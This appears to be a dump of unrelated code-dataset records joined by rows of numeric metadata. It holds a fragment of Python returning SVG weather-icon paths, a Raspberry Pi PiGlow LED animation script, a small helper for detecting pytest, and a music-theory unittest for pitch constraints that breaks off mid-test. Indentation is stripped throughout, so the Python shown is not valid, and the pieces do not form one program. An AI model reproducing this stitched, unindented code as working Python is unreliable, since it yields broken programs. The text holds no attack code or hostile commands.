c1.105,0,2,0.896,2,2c0,1.105-0.895,2-2,2c-1.104,0-1.999-0.895-1.999-2C56,58.537,56.896,57.641,57.999,57.641z M57.999,65.641 c1.105,0,2,0.895,2,2c0,1.104-0.895,1.998-2,1.998c-1.104,0-1.999-0.895-1.999-1.998C56,66.535,56.896,65.641,57.999,65.641z" />'
def getSleet():
return getSnow()
def getWind():
return '<path d="m 36.487886,31.712413 -7.4209,5.614747 -1.239742,0 0,-1.686046 -3.613959,0 0,32.148333 3.613959,0 0,-28.954574 1.286522,0 6.438465,4.155668 0.935655,0.04863 c 6.772487,-0.02017 8.174561,5.572594 20.993709,5.571513 4.65253,10e-4 6.520094,-1.29179 9.210331,-1.280746 4.597097,-0.01101 8.812682,2.102152 8.812682,2.102152 l 2.473633,-7.122458 c 0,0 -6.264433,-4.48985 -16.68386,-4.479907 -0.702187,-0.0099 -2.173664,0.189825 -3.070114,0.183735 -8.933613,0.006 -4.236867,-6.314021 -21.736381,-6.301051 z m -0.09357,1.048376 -0.742677,9.408344 -6.286419,-4.112434 7.029096,-5.29591 z" />'
def getFog():
return '<path d="M29.177,55.641c-0.262-0.646-0.473-1.315-0.648-2h43.47 c0,0.684-0.07,1.348-0.181,2H29.177z M36.263,35.643c2.294-1.271,4.93-1.999,7.738-1.999c2.806,0,5.436,0.73,7.727,1.999H36.263z M28.142,47.642c0.085-0.682,0.218-1.347,0.387-1.999h40.396c0.551,0.613,1.039,1.281,1.455,1.999H28.142z M29.177,43.643 c0.281-0.693,0.613-1.359,0.984-2h27.682c0.04,0.068,0.084,0.135,0.123,0.205c0.664-0.114,1.338-0.205,2.033-0.205 c2.451,0,4.729,0.738,6.627,2H29.177z M31.524,39.643c0.58-0.723,1.225-1.388,1.92-2h21.122c0.69,0.61,1.326,1.28,1.903,2H31.524z M71.817,51.641H28.142c-0.082-0.656-0.139-1.32-0.139-1.999h43.298C71.528,50.285,71.702,50.953,71.817,51.641z M71.301,57.641 c-0.247,0.699-0.555,1.367-0.921,2H31.524c-0.505-0.629-0.957-1.299-1.363-2H71.301z M33.444,61.641h35.48 c-0.68,0.758-1.447,1.434-2.299,1.999H36.263C35.247,63.078,34.309,62.4,33.444,61.641z" />'
def getCloudy():
return '<path d="M43.945,65.639c-8.835,0-15.998-7.162-15.998-15.998 c0-8.836,7.163-15.998,15.998-15.998c6.004,0,11.229,3.312,13.965,8.203c0.664-0.113,1.338-0.205,2.033-0.205 c6.627,0,11.999,5.373,11.999,12c0,6.625-5.372,11.998-11.999,11.998C57.168,65.639,47.143,65.639,43.945,65.639z M59.943,61.639 c4.418,0,8-3.582,8-7.998c0-4.418-3.582-8-8-8c-1.6,0-3.082,0.481-4.333,1.291c-1.231-5.316-5.974-9.29-11.665-9.29 c-6.626,0-11.998,5.372-11.998,11.999c0,6.626,5.372,11.998,11.998,11.998C47.562,61.639,56.924,61.639,59.943,61.639z" />'
def getPartlyCloudyDay():
return '<path d="m 70.964271,47.439013 -3.309389,0 c -0.913392,0 -1.654695,-0.740476 -1.654695,-1.654695 0,-0.913391 0.741303,-1.65304 1.654695,-1.65304 l 3.309389,0 c 0.913392,0 1.654695,0.740476 1.654695,1.65304 0,0.914219 -0.741303,1.654695 -1.654695,1.654695 z M 64.463803,36.425365 c -0.646158,0.646158 -1.69358,0.646158 -2.339738,0 -0.646158,-0.645331 -0.646158,-1.69358 0,-2.338911 l 2.339738,-2.339739 c 0.646158,-0.646158 1.69358,-0.646158 2.339738,0 0.646159,0.645331 0.646159,1.69358 0,2.339739 l -2.339738,2.338911 z m -2.438193,12.91241 0,0 c 1.447031,1.725847 2.321537,3.946447 2.321537,6.374711 0,5.481177 -4.44451,9.926514 -9.927341,9.926514 -2.295889,0 -10.590873,0 -13.235903,0 -7.309614,0 -13.235903,-5.925462 -13.235903,-13.235903 0,-7.310441 5.926289,-13.235903 13.235903,-13.235903 1.30059,0 2.556503,0.191944 3.742092,0.541085 1.816028,-2.338911 4.648038,-3.850475 7.839116,-3.850475 5.482831,0 9.927341,4.445338 9.927341,9.926514 -8.27e-4,1.253431 -0.24324,2.449776 -0.666842,3.553457 z m -30.769048,3.065322 c 0,5.482831 4.443683,9.926514 9.926514,9.926514 2.991688,0 10.738141,0 13.235903,0 3.65522,0 6.617951,-2.963559 6.617951,-6.617125 0,-3.65522 -2.962731,-6.618779 -6.617951,-6.618779 -1.323756,0 -2.550712,0.398782 -3.584896,1.068106 -1.018465,-4.398179 -4.942573,-7.68523 -9.651007,-7.68523 -5.482831,0 -9.926514,4.443683 -9.926514,9.926514 z M 52.764284,39.167194 c -1.830092,0 -3.487269,0.742958 -4.684441,1.943439 1.935993,1.188071 3.545184,2.85683 4.657139,4.843291 0.549358,-0.09349 1.106163,-0.169606 1.681997,-0.169606 1.758113,0 3.407844,0.462487 4.839982,1.263359 l 0,0 c 0.07943,-0.408709 0.124102,-0.830656 0.124102,-1.263359 0,-3.653566 -2.963558,-6.617124 -6.618779,-6.617124 z m 0,-6.618779 c -0.913391,0 -1.653867,-0.740476 -1.653867,-1.653867 l 0,-3.308563 c 0,-0.914218 0.741303,-1.654694 1.653867,-1.654694 0.914219,0 1.654695,0.740476 1.654695,1.654694 l 0,3.308563 c 0,0.914218 -0.739649,1.653867 -1.654695,1.653867 z m -11.698692,3.87695 -2.338911,-2.338911 c -0.646158,-0.646159 -0.646158,-1.694408 0,-2.339739 0.645331,-0.646158 1.69358,-0.646158 2.338911,0 l 2.339739,2.339739 c 0.646158,0.645331 0.646158,1.69358 0,2.338911 -0.645331,0.646158 -1.69358,0.646158 -2.339739,0 z" />'
def getPartlyCloudyNight():
return '<path d="M69.763,46.758L69.763,46.758c1.368,1.949,2.179,4.318,2.179,6.883 c0,6.625-5.371,11.998-11.998,11.998c-2.775,0-12.801,0-15.998,0c-8.836,0-15.998-7.162-15.998-15.998s7.162-15.998,15.998-15.998 c2.002,0,3.914,0.375,5.68,1.047l0,0c1.635-4.682,6.078-8.047,11.318-8.047c0.755,0,1.491,0.078,2.207,0.212 c-0.131,0.575-0.207,1.173-0.207,1.788c0,4.418,3.581,7.999,7.998,7.999c0.616,0,1.213-0.076,1.789-0.208 c0.133,0.717,0.211,1.453,0.211,2.208C72.941,41.775,71.73,44.621,69.763,46.758z M31.947,49.641 c0,6.627,5.371,11.998,11.998,11.998c3.616,0,12.979,0,15.998,0c4.418,0,7.999-3.582,7.999-7.998c0-4.418-3.581-8-7.999-8 c-1.6,0-3.083,0.482-4.334,1.291c-1.231-5.316-5.973-9.29-11.664-9.29C37.318,37.642,31.947,43.014,31.947,49.641z M51.496,35.545 c0.001,0,0.002,0,0.002,0S51.497,35.545,51.496,35.545z M59.155,30.85c-2.9,0.664-5.175,2.91-5.925,5.775l0,0 c1.918,1.372,3.523,3.152,4.68,5.22c0.664-0.113,1.337-0.205,2.033-0.205c2.618,0,5.033,0.85,7.005,2.271l0,0 c0.858-0.979,1.485-2.168,1.786-3.482C63.881,39.525,60.059,35.706,59.155,30.85z" />'
| 239.477273
| 2,238
| 0.684255
| 2,870
| 10,537
| 2.512195
| 0.256446
| 0.007767
| 0.010402
| 0.008322
| 0.260055
| 0.242164
| 0.19681
| 0.16699
| 0.140361
| 0.100416
| 0
| 0.64154
| 0.058271
| 10,537
| 43
| 2,239
| 245.046512
| 0.085055
| 0.028281
| 0
| 0
| 0
| 0.454545
| 0.964813
| 0.527417
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
7a833c651fbedbfc36572f003b67f71b82243996
| 11,809
|
py
|
Python
|
Programs/slithering_snakes.py
|
ShineTop/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 5
|
2018-03-16T19:09:50.000Z
|
2022-02-06T21:37:35.000Z
|
Programs/slithering_snakes.py
|
Breakfast-for-Pigeons/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 3
|
2018-10-02T16:06:19.000Z
|
2020-03-01T19:07:31.000Z
|
Programs/slithering_snakes.py
|
ShineTop/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 1
|
2017-11-03T13:36:35.000Z
|
2017-11-03T13:36:35.000Z
|
#!/usr/bin/env python3
"""
Slithering Snakes
I think the title is self-explanatory.
....................
Functions:
- slithering_snake_12: Lights up then turns off the LEDs on arms 1 and 2
- slithering_snake_13: Lights up then turns off the LEDs on arms 1 and 3
- slithering_snake_21: Lights up then turns off the LEDs on arms 2 and 1
- slithering_snake_23: Lights up then turns off the LEDs on arms 2 and 3
- slithering_snake_31: Lights up then turns off the LEDs on arms 3 and 1
- slithering_snake_32: Lights up then turns off the LEDs on arms 3 and 2
....................
Requirements:
PyGlow.py (many thanks to benleb for this program)
bfp_piglow_modules.py
You will have these files if you downloaded the entire repository.
....................
Author: Paul Ryan
This program was written on a Raspberry Pi using the Geany IDE.
"""
########################################################################
# Import modules #
########################################################################
import logging
from time import sleep
from PyGlow import PyGlow
from bfp_piglow_modules import print_header
from bfp_piglow_modules import check_log_directory
from bfp_piglow_modules import delete_empty_logs
from bfp_piglow_modules import stop
########################################################################
# Initialize #
########################################################################
PYGLOW = PyGlow()
PYGLOW.all(0)
########################################################################
# Functions #
########################################################################
def slithering_snake_12():
"""
Lights up then turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("Slithering Snake 1-2")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 12
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_13():
"""
Lights up then turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("Slithering Snake 1-3")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 13
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_21():
"""
Lights up then turns off the LEDs on arms 2 and 1
"""
LOGGER.debug("Slithering Snake 2-1")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 21
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_23():
"""
Lights up then turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("Slithering Snake 2-3")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 23
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_31():
"""
Lights up then turns off the LEDs on arms 3 and 1
"""
LOGGER.debug("Slithering Snake 3-1")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 31
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_32():
"""
Lights up then turns off the LEDs on arms 3 and 2
"""
LOGGER.debug("Slithering Snake 3-2")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 32
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def main():
"""
The main function
"""
LOGGER.debug("START")
# Snakes 12, 13, 21, 23, 31, 32
slithering_snake_12()
slithering_snake_13()
slithering_snake_21()
slithering_snake_23()
slithering_snake_31()
slithering_snake_32()
# Snakes 12, 23, 31, 13, 32, 21
slithering_snake_12()
slithering_snake_23()
slithering_snake_31()
slithering_snake_13()
slithering_snake_32()
slithering_snake_21()
# Snakes 13, 12, 23, 21, 31, 32
slithering_snake_13()
slithering_snake_12()
slithering_snake_23()
slithering_snake_21()
slithering_snake_31()
slithering_snake_32()
# Snakes 13, 32, 21, 12, 23, 31
slithering_snake_13()
slithering_snake_32()
slithering_snake_21()
slithering_snake_12()
slithering_snake_23()
slithering_snake_31()
LOGGER.debug("END")
delete_empty_logs(LOG)
stop()
if __name__ == '__main__':
try:
# STEP01: Check if Log directory exists.
check_log_directory()
# STEP02: Enable logging
LOG = 'Logs/slithering_snakes.log'
LOG_FORMAT = '%(asctime)s %(name)s: %(funcName)s: \
%(levelname)s: %(message)s'
LOGGER = logging.getLogger(__name__)
# Nothing will log unless logging level is changed to DEBUG
LOGGER.setLevel(logging.ERROR)
FORMATTER = logging.Formatter(fmt=LOG_FORMAT,
datefmt='%m/%d/%y %I:%M:%S %p:')
FILE_HANDLER = logging.FileHandler(LOG, 'w')
FILE_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(FILE_HANDLER)
# STEP03: Print header
print_header()
# STEP04: Print instructions in white text
print("\033[1;37;40mPress Ctrl-C to stop the program.")
# STEP05: Run the main function
main()
except KeyboardInterrupt:
delete_empty_logs(LOG)
stop()
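# The six slithering_snake_* functions above differ only in the order of the
# LEDs they touch. As an illustration (not part of the original program), the
# same behaviour can be written data-driven; the two sequences below are
# copied verbatim from slithering_snake_12 and slithering_snake_13.
SNAKE_LEDS = {
    '12': [1, 2, 3, 4, 5, 6, 18, 11, 10, 9, 8, 7],
    '13': [1, 2, 3, 4, 5, 12, 18, 17, 16, 15, 14, 13],
}

def slithering_snake(leds, sleep_speed=0.10):
    """Light up, then turn off, the given LEDs in order."""
    for brightness in (100, 0):
        for led in leds:
            PYGLOW.led(led, brightness)
            sleep(sleep_speed)
    # Pause before the next snake
    sleep(1)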
| 23.856566
| 72
| 0.602761
| 1,670
| 11,809
| 4.105389
| 0.094611
| 0.218786
| 0.315053
| 0.404317
| 0.843057
| 0.806884
| 0.784131
| 0.77713
| 0.740082
| 0.740082
| 0
| 0.082223
| 0.250233
| 11,809
| 494
| 73
| 23.904858
| 0.692117
| 0.174697
| 0
| 0.888889
| 0
| 0
| 0.025093
| 0.002837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01897
| false
| 0
| 0.01897
| 0
| 0.03794
| 0.00813
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7aa9f1ea0f1585e054f15a33ac6e5bd0c1252ce1
| 222
|
py
|
Python
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 18
|
2021-11-30T04:02:13.000Z
|
2022-03-24T12:33:57.000Z
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 1
|
2022-02-04T17:07:38.000Z
|
2022-02-04T17:07:38.000Z
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 5
|
2022-01-31T05:28:13.000Z
|
2022-03-08T17:25:31.000Z
|
import os
import sys
def is_pytest_running():
# TODO(dmu) MEDIUM: Implement a better way of detecting pytest
return os.getenv('PYTEST_RUNNING') == 'true' or os.path.basename(sys.argv[0]) in ('pytest', 'py.test')
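# A minimal sketch (illustrative, not part of the original module) exercising
# the environment-variable branch; the assumption that the test settings export
# PYTEST_RUNNING=true is ours, based on the check above.
if __name__ == '__main__':
    os.environ['PYTEST_RUNNING'] = 'true'
    print(is_pytest_running())  # -> True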
| 27.75
| 106
| 0.702703
| 35
| 222
| 4.371429
| 0.771429
| 0.169935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005348
| 0.157658
| 222
| 7
| 107
| 31.714286
| 0.812834
| 0.27027
| 0
| 0
| 0
| 0
| 0.19375
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8fe9542deec2e59a607f26732d427fb6109ce50f
| 11,877
|
py
|
Python
|
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | 1
|
2021-05-06T19:45:54.000Z
|
2021-05-06T19:45:54.000Z
|
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | null | null | null |
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | null | null | null |
import unittest
from tonalmodel.tonality import Tonality
from harmoniccontext.harmonic_context import HarmonicContext
from melody.constraints.policy_context import PolicyContext
from melody.constraints.contextual_note import ContextualNote
from tonalmodel.modality import ModalityType
from tonalmodel.diatonic_tone import DiatonicTone
from harmonicmodel.tertian_chord_template import TertianChordTemplate
from timemodel.duration import Duration
from tonalmodel.diatonic_pitch import DiatonicPitch
from tonalmodel.pitch_range import PitchRange
from structure.note import Note
from melody.constraints.comparative_pitch_constraint import ComparativePitchConstraint
from operator import attrgetter
import logging
import sys
class TestComparativePitchConstraint(unittest.TestCase):
# Note: add '-s --nologcapture' to the additional arguments in the run configuration to see logging output
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
def test_basic_policy(self):
logging.debug('Start test_basic_policy')
lower_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('G'), 'tV',
'C:4', 'C:6')
upper_note_1 = Note(DiatonicPitch.parse('C:5'), Duration(1, 8))
upper_note_2 = Note(DiatonicPitch.parse('D:5'), Duration(1, 8))
lower_note_1 = ContextualNote(lower_policy_context, Note(DiatonicPitch.parse('F#:5'), Duration(1, 8)))
lower_note_2 = ContextualNote(lower_policy_context)
p_map = dict([(upper_note_1, lower_note_1),
(upper_note_2, lower_note_2)])
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_THAN)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 4
for pitch in pitches:
assert pitch.chromatic_distance > DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} <= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do GREATER_THAN: solutions must lie below F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_THAN)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 10
for pitch in pitches:
assert pitch.chromatic_distance < DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} >= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do LESS_EQUAL: solutions must lie at or above F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 5
for pitch in pitches:
assert pitch.chromatic_distance >= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} < {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do GREATER_EQUAL: solutions must lie at or below F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 11
for pitch in pitches:
assert pitch.chromatic_distance <= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} > {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 1
for pitch in pitches:
assert pitch.chromatic_distance == DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} != {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
logging.debug('End test_basic_policy')
def test_comparative_reversal(self):
logging.debug('Start test_comparative_reversal')
upper_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('Ab'), 'tIV',
'C:4', 'C:6')
lower_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('G'), 'tV',
'C:4', 'C:6')
upper_note_1 = Note(DiatonicPitch.parse('C:5'), Duration(1, 8))
upper_note_2 = Note(DiatonicPitch.parse('D:5'), Duration(1, 8))
lower_note_1 = ContextualNote(lower_policy_context)
lower_note_2 = ContextualNote(lower_policy_context, Note(DiatonicPitch.parse('F#:5'), Duration(1, 8)))
p_map = dict([(upper_note_1, lower_note_1),
(upper_note_2, lower_note_2)])
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_THAN)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
